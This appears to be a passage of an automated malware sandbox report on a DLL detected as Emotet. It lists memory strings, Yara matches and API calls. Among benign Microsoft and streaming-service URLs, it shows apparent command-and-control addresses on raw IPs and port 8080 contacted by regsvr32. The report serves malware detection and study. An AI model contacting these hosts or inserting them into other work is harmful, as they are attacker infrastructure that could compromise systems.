music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-05-13T10:00:01.2192622Z\|\|.\|\|8adb3f26-c14b-4fc0-afb3-91b3c6daaa3f\|\|1152921505694830749\|\|Null\|\|fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
Source: svchost.exe, 0000001B.00000003.448167957.00000186AF97E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.448143031.00000186AF96D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-05-13T10:00:01.2192622Z\|\|.\|\|8adb3f26-c14b-4fc0-afb3-91b3c6daaa3f\|\|1152921505694830749\|\|Null\|\|fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab

Source: regsvr32.exe, 00000005.00000002.771054201.0000000003272000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000003.339108114.0000000003272000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.665712377.000002AB09264000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000002.488629201.00000186AF900000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: svchost.exe, 00000011.00000002.665573264.000002AB09200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000002.488587316.00000186AF0EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: regsvr32.exe, 00000005.00000002.770868874.0000000003215000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000003.337062261.00000000032CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/
Source: regsvr32.exe, 00000005.00000002.771032007.0000000003267000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000003.339220030.0000000003267000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: 77EC63BDA74BD0D0E0426DC8F80085060.5.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: regsvr32.exe, 00000005.00000002.771054201.0000000003272000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000003.339108114.0000000003272000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab&
Source: regsvr32.exe, 00000005.00000002.771054201.0000000003272000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000003.339108114.0000000003272000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab4
Source: regsvr32.exe, 00000005.00000002.771054201.0000000003272000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000003.339108114.0000000003272000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?f216801688bf1
Source: svchost.exe, 0000001B.00000003.462058473.00000186AF98A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://help.disneyplus.com.
Source: svchost.exe, 0000000C.00000002.313195094.000001252E013000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.bingmapsportal.com
Source: svchost.exe, 0000000A.00000002.770920270.0000013249643000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://%s.dnet.xboxlive.com
Source: svchost.exe, 0000000A.00000002.770920270.0000013249643000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://%s.xboxlive.com
Source: regsvr32.exe, 00000005.00000003.339145753.0000000003229000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000002.770904294.0000000003229000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://51.91.76.89/
Source: regsvr32.exe, 00000005.00000002.770904294.0000000003229000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://51.91.76.89:8080/XmBjfLdyjiONnyu
Source: regsvr32.exe, 00000005.00000003.339145753.0000000003229000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000002.770904294.0000000003229000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://51.91.76.89:8080/XmBjfLdyjiONnyu7
Source: regsvr32.exe, 00000005.00000003.339145753.0000000003229000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000002.770904294.0000000003229000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://51.91.76.89:8080/XmBjfLdyjiONnyuk
Source: regsvr32.exe, 00000005.00000003.339145753.0000000003229000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000003.333917146.0000000003229000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000003.288453875.0000000003249000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000003.333938597.0000000003249000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000002.770904294.0000000003229000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000003.288429442.0000000003229000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://70.36.102.35/
Source: regsvr32.exe, 00000005.00000003.339145753.0000000003229000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000003.288453875.0000000003249000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000003.333938597.0000000003249000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000002.770904294.0000000003229000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://70.36.102.35/P
Source: regsvr32.exe, 00000005.00000003.333917146.0000000003229000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000003.288429442.0000000003229000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000003.333983810.0000000003233000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://70.36.102.35/PpwpiLVQKLAVQPcJCjUgIqOwzNSDxPcIiuOpSdaWzktqJ
Source: regsvr32.exe, 00000005.00000003.288429442.0000000003229000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://70.36.102.35/PpwpiLVQKLAVQPcJCjUgIqOwzNSDxPcIiuOpSdaWzktqJ6
Source: regsvr32.exe, 00000005.00000003.333938597.0000000003249000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000002.770904294.0000000003229000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000003.333983810.0000000003233000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://92.240.254.110/
Source: regsvr32.exe, 00000005.00000003.339145753.0000000003229000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000003.333938597.0000000003249000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000002.770904294.0000000003229000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://92.240.254.110/z
Source: regsvr32.exe, 00000005.00000003.333917146.0000000003229000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000003.333938597.0000000003249000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000003.333983810.0000000003233000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000003.333956302.000000000326D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://92.240.254.110:8080/dcVXUfIrbEqGvwTijlwPnDGbteKRAwUlvJPRnWYDyYziFTKvRaH
Source: regsvr32.exe, 00000005.00000002.771032007.0000000003267000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000003.339220030.0000000003267000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://92.240.254.110:8080/dcVXUfIrbEqGvwTijlwPnDGbteKRAwUlvJPRnWYDyYziFTKvRaHh
Source: regsvr32.exe, 00000005.00000003.339145753.0000000003229000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000003.333938597.0000000003249000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000002.770904294.0000000003229000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://92.240.254.110:8080/dcVXUfIrbEqGvwTijlwPnDGbteKRAwUlvJPRnWYDyYziFTKvRaHq
Source: svchost.exe, 0000000A.00000002.770920270.0000013249643000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com
Source: svchost.exe, 0000000C.00000003.312860008.000001252E061000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
Source: svchost.exe, 0000000A.00000002.770920270.0000013249643000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 0000000A.00000002.770920270.0000013249643000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 0000000C.00000003.312882702.000001252E05E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 0000000C.00000003.312901400.000001252E059000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.313245465.000001252E05A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 0000000C.00000003.312860008.000001252E061000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 0000000C.00000002.313225041.000001252E03D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 0000000C.00000003.312901400.000001252E059000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.313245465.000001252E05A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
Source: svchost.exe, 0000000C.00000002.313257911.000001252E06A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.312838362.000001252E068000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
Source: svchost.exe, 0000000C.00000003.312860008.000001252E061000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 0000000C.00000003.312946662.000001252E047000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.313237627.000001252E04E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.312919555.000001252E040000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 0000000C.00000003.312901400.000001252E059000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.313245465.000001252E05A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 0000000C.00000003.312860008.000001252E061000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
Source: svchost.exe, 0000000C.00000002.313225041.000001252E03D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 0000000C.00000003.312860008.000001252E061000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 0000000C.00000003.312860008.000001252E061000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 0000000C.00000003.312860008.000001252E061000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 0000000C.00000003.312919555.000001252E040000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 0000000C.00000003.312964722.000001252E041000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.313229917.000001252E042000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.312919555.000001252E040000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
Source: svchost.exe, 0000000C.00000003.312860008.000001252E061000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 0000000C.00000003.312901400.000001252E059000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.313245465.000001252E05A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.312919555.000001252E040000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: svchost.exe, 0000001B.00000003.462058473.00000186AF98A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://disneyplus.com/legal.
Source: svchost.exe, 0000000C.00000003.312882702.000001252E05E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 0000000C.00000002.313245465.000001252E05A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 0000000C.00000003.312901400.000001252E059000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.313245465.000001252E05A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 0000000C.00000003.312919555.000001252E040000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dynamic.t
Source: svchost.exe, 0000000C.00000003.312860008.000001252E061000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 0000000C.00000002.313225041.000001252E03D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 0000000C.00000003.291213383.000001252E032000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 0000001B.00000003.458469529.00000186AF9AE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.458550220.00000186AF9AE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.458573199.00000186AFE19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.458510436.00000186AFE03000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.458456149.00000186AF99E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.458495025.00000186AFE02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.458534831.00000186AF98C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.hotspotshield.com/
Source: svchost.exe, 0000000C.00000002.313225041.000001252E03D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 0000000C.00000002.313195094.000001252E013000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.313225041.000001252E03D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 0000000C.00000003.312958792.000001252E045000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.312919555.000001252E040000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 0000000C.00000003.312958792.000001252E045000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.312919555.000001252E040000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
Source: svchost.exe, 0000000C.00000003.312919555.000001252E040000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 0000000C.00000003.291213383.000001252E032000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.313221295.000001252E03B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: svchost.exe, 0000000C.00000003.312946662.000001252E047000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.313237627.000001252E04E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.312919555.000001252E040000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
Source: svchost.exe, 0000001B.00000003.462058473.00000186AF98A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
Source: svchost.exe, 0000001B.00000003.462058473.00000186AF98A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
Source: svchost.exe, 0000001B.00000003.458469529.00000186AF9AE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.458550220.00000186AF9AE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.458573199.00000186AFE19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.458510436.00000186AFE03000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.458456149.00000186AF99E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.458495025.00000186AFE02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.458534831.00000186AF98C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.hotspotshield.com/terms/
Source: svchost.exe, 0000001B.00000003.458469529.00000186AF9AE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.458550220.00000186AF9AE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.458573199.00000186AFE19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.458510436.00000186AFE03000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.458456149.00000186AF99E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.458495025.00000186AFE02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.458534831.00000186AF98C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.pango.co/privacy
Source: svchost.exe, 0000001B.00000003.467022331.00000186AF98A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.tiktok.com/legal/report
Source: svchost.exe, 0000001B.00000003.467022331.00000186AF98A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.467086716.00000186AFE02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.466792013.00000186AF9B3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.467007034.00000186AF9B3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.467046280.00000186AF99D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.tiktok.com/legal/report/feedback

Source: unknown

DNS traffic detected: queries for: time.windows.com

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1000ACED GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,	0_2_1000ACED
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_1000ACED GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,	2_2_1000ACED
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_1000ACED GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,	3_2_1000ACED

E-Banking Fraud

Yara detected Emotet

Source: Yara match	File source: 0.2.loaddll32.exe.14c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.2930000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.2930000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.regsvr32.exe.3130000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.4820000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.regsvr32.exe.3160000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.2fa0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.4820000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.2960000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.4850000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.regsvr32.exe.3130000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.4cd0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.4ca0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.14c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.4ca0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.258712818.0000000002961000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.260692341.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.256529300.0000000004851000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.770607466.0000000003161000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.258645110.0000000002930000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.260871935.0000000002FA1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.256499819.0000000004820000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.256563741.0000000004CA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.256596142.0000000004CD1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.770438972.0000000003130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: FC6cLk6kKz.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: C:\Windows\SysWOW64\regsvr32.exe

File deleted: C:\Windows\SysWOW64\Anlmboaezrrhbcj\abeeslpuqdrokho.stf:Zone.Identifier

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

